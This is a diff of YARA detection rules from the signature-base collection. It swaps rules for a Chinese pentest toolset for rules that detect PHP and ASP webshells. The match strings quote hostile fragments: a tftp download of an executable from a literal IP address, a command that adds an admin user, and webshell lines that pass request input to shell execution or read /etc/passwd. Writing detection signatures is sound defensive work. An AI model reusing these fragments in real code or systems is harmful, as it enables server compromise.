-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L222-L237"
+		id = "a22a0a5c-a686-517e-b1f9-279edab0616b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6562-L6574"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6bed45629c5e54986f2d27cbfc53464108911026"
-		logic_hash = "7b0b6bbcba49c8f950ea3cf5a364059ba784c87a41eba6d825a9ca4e3a07bfbc"
-		score = 70
+		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
+		logic_hash = "611636b3fa9a3163574b18cf8eacebea9733a1ad381261387f79a532b003e8fd"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
-		$s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
+		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_D_Injection_V2_32 : FILE
+rule SIGNATURE_BASE_Webshell_Phpspy_Ver_2006
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
+		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L239-L254"
+		id = "adbb1963-31c8-5540-a679-c75b1101c163"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6575-L6589"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
-		logic_hash = "0107903a481b09faa92a5fbb162fd981f976ed864be3a0840b43063461e20974"
-		score = 70
+		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
+		logic_hash = "69bd2c387b0e676168116f3b3c3c081e08fd555cc6bc9a94b9c8ef97f194b09f"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide
-		$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
+		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
+		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
+		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Net_Priv_Esc2 : FILE
+rule SIGNATURE_BASE_Webshell_Zyklonshell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
+		description = "PHP Webshells Github Archive - file ZyklonShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L256-L271"
+		id = "4d7ff3e5-4940-52c8-b045-5db1523f70c2"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6590-L6604"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17"
-		logic_hash = "53cf3d984bc82428eb0a6ee416bcd5429718a1d615ce1c1ba399cda42268d26c"
-		score = 70
+		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
+		logic_hash = "5d49f2599781836156f6bbb0c50cfcffdb2ca51c7cb688abbc6245d7f856ad01"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Usage:%s username password" fullword ascii
-		$s2 = "<www.darkst.com>" fullword ascii
+		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
+		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
+		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
+		$s3 = "<H1>Not Found</H1>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 17KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Oracle_V1_0_Oracle : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
+		description = "PHP Webshells Github Archive - file myshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L273-L289"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_php_webshells_myshell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6605-L6620"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
-		logic_hash = "6f1bb6b14445a9ca29768ab2dcf831a98cb5d153d03ebc4bc497bb8f8144a365"
-		score = 70
+		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
+		logic_hash = "7765e43189d6ec0cda0b58d00cfd7fc8cec89287dbac7487083b6ce1ce55f306"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "!http://localhost/index.asp?id=zhr" fullword ascii
-		$s2 = "OnGetPassword" fullword ascii
-		$s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
+		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
+		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3455KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Interception : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Lolipop
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
+		description = "PHP Webshells Github Archive - file lolipop.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L291-L306"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6621-L6634"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
-		logic_hash = "d1ae5f8ff21659b95f6e62b1d5e3ec15b122a2b5889e8984f3d9f6d2fa938d17"
-		score = 70
+		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
+		logic_hash = "8b0dcf76a244f80d4bee0c62189df55c1f8d71cf0900cd8ebb5916f5fe972bed"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = ".\\dat\\Hookmsgina.dll" fullword ascii
-		$s5 = "WinlogonHackEx " fullword wide
+		$s3 = "$commander = $_POST['commander']; " fullword
+		$s9 = "$sourcego = $_POST['sourcego']; " fullword
+		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_3_0 : FILE
+rule SIGNATURE_BASE_Webshell_Simple_Cmd
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
+		description = "PHP Webshells Github Archive - file simple_cmd.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "994ad7e9-2019-54b3-84e6-2762a700c939"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L308-L324"
+		id = "1fd0c01a-c265-5e30-ab36-e8e93e316fbe"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6635-L6649"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992"
-		logic_hash = "6d2f6721c942332af1be0b6537e9b9d0b5b3e91eb3912dcd095aa18bccfc4ad5"
-		score = 70
+		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
+		logic_hash = "82a65f4bbdcd2fc626aa9f36fe530d19aa19a48389e970c26e525597818914ee"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s9 = "CryptGenRandom" fullword ascii
+		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s2 = "<title>G-Security Webshell</title>" fullword
+		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 395KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Windows_Exp : FILE
+rule SIGNATURE_BASE_Webshell_Go_Shell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file exp.exe"
+		description = "PHP Webshells Github Archive - file go-shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L326-L341"
+		id = "63eaf530-050a-5db7-8885-d4a1e86d62de"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6650-L6665"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "04334c396b165db6e18e9b76094991d681e6c993"
-		logic_hash = "6a146545fd12e7603bf1e2ccb9b2d308b13fe2acdb9248a79c80b6c1de37fd73"
-		score = 70
+		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
+		logic_hash = "f2fcefb9a0536c80fa74ceb002e113f95de53d1f56e22c81b542c395dd11071d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\windows\\system32\\command.com /c " fullword ascii
-		$s8 = "OH,Sry.Too long command." fullword ascii
+		$s0 = "#change this password; for power security - delete this file =)" fullword
+		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
+		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
+		$s12 = "print << \"[kalabanga]\";" fullword
+		$s13 = "<title>GO.cgi</title>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Safe3Wvs_Cgiscan : FILE
+rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
+		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a9f7a195-deb8-5887-bc55-d1b0cac43182"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L343-L358"
+		id = "10546549-e16d-567d-9d88-3d37fe8ff03f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_aZRaiLPhp_v1_0"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6666-L6681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75"
-		logic_hash = "990dcede3bb83216af7e72e2a49bc2355ebd45ebd3fc658ba337a285dcdf799f"
-		score = 70
+		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
+		logic_hash = "8309338bb327cc14ae5970bd921b3dba68353d55be31b9dbbc5374ded24ed563"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "httpclient.exe" fullword wide
-		$s3 = "www.safe3.com.cn" fullword wide
+		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
+		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
+		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
+		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 357KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Pr_Debug : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_Zehir4
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file debug.exe"
+		description = "Webshells Github Archive - file zehir4"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d759818-b762-56f4-8475-82a7d18a659c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L360-L375"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6682-L6695"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
-		logic_hash = "0b7508e3a508adc9416f16549290e06468520c156dbd5192e5a352820586af9f"
-		score = 70
+		hash = "788928ae87551f286d189e163e55410acbb90a64"
+		logic_hash = "36b6940ffecd9be190cce62252ec7d87f1c0bc0d19b4442df63f4404eb316364"
+		score = 55
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "-->Got WMI process Pid: %d " ascii
-		$s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii
+		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
+		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 820KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_0 : FILE
+rule SIGNATURE_BASE_Webshell_Zehir4_Asp_Php
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
+		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L377-L392"
+		id = "7a849bc6-fff5-5bb6-aff7-660889fd077b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6696-L6709"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "98f21f72c761e504814f0a7db835a24a2413a6c2"
-		logic_hash = "bd6f9b6e831573164fddf7f0188087eb0076410b77c9c06cfacadebe6a53b525"
-		score = 70
-		quality = 85
-		tags = "FILE"
+		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
+		logic_hash = "dfaf685ac3b364143bfbe289b05f066b09f01622fec3e9157f4b4791f7567619"
+		score = 75
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "LOADER ERROR" fullword ascii
-		$s15 = "2011-2012 T00LS&RICES" fullword wide
+		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
+		$s11 = "frames.byZehir.document.execCommand("
+		$s15 = "frames.byZehir.document.execCommand(co"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2077KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Matrixay1073 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Lostdc
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
+		description = "PHP Webshells Github Archive - file lostDC.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L394-L412"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6710-L6725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fef951e47524f827c7698f4508ba9551359578a5"
-		logic_hash = "e64cae48344e5dae8ec80b2897305a0b380340bdd2973eb0828582f18ef8bf2b"
-		score = 70
+		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
+		logic_hash = "e3cd28f4a72f5a8a92c728fe76a7159c28256e87daf4c1dd10190a57263f5b45"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii
-		$s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii
-		$s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii
-		$s3 = "getalluserpasswordhash" fullword ascii
+		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
+		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
+		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
+		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
+		$s12 = "$ret = shellexec($command);" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9100KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sword1_5 : FILE
+rule SIGNATURE_BASE_Webshell_Casus_1_5
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe"
+		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "832e4998-64fc-5f34-a46d-aeefde0ee763"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L414-L431"
+		id = "cf89d8f8-d498-57fe-98eb-a98350db182f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6726-L6739"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
-		logic_hash = "0f7630b2ec983df2a065b049000cef6de38f884254748a342b2fd84d8c5985af"
-		score = 70
+		hash = "7eee8882ad9b940407acc0146db018c302696341"
+		logic_hash = "0dbaa39bd33047d24e5bc9716108c5581da3f54e93d90f9c550b3d84de1ebfe2"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://www.md5.com.cn" fullword wide
-		$s2 = "ListBox_Command" fullword wide
-		$s3 = "\\Set.ini" wide
-		$s4 = "OpenFileDialog1" fullword wide
+		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
+		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
+		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 740KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Havij_Havij : FILE
+rule SIGNATURE_BASE_Webshell_Ftpsearch
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
+		description = "PHP Webshells Github Archive - file ftpsearch.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L433-L448"
+		id = "9db8f00a-1843-5057-b8c7-a7f7b63e0659"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6740-L6754"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
-		logic_hash = "e8aff3e1e536cd35b10bdaab4818542bce284e7ed3aa7ef1920763669faf4c8a"
-		score = 70
+		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
+		logic_hash = "6b32553be4fdf26776e3cbb8a5d4d011d88f2bd50949b65934df72b89065aeec"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "User-Agent: %Inject_Here%" fullword wide
-		$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii
+		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
+		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
+		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
+		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Ms11011 : FILE
+rule SIGNATURE_BASE_Webshell__Cyber_Shell_Cybershell_Cyber_Shell__V_1_0_
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc092166-73cd-58f6-b034-a2fe2c5fb859"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L450-L468"
+		id = "79146f25-87b9-5216-af88-4e433bb08b90"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6755-L6772"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
-		logic_hash = "f92d71f163a49a158d85b821d71fd17e84e0d3deb19515ae0cf6a063a05c027b"
-		score = 70
+		logic_hash = "fc2cf9a25ccc5aa3d9dc287ef9600b065ba9025cfb0a1ccca1bce9120ea03ff4"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
 
 	strings:
-		$s0 = "\\i386\\Hello.pdb" ascii
-		$s1 = "OS not supported." fullword ascii
-		$s2 = ".Rich5" fullword ascii
-		$s3 = "Not supported." fullword wide
-		$s5 = "cmd.exe" fullword ascii
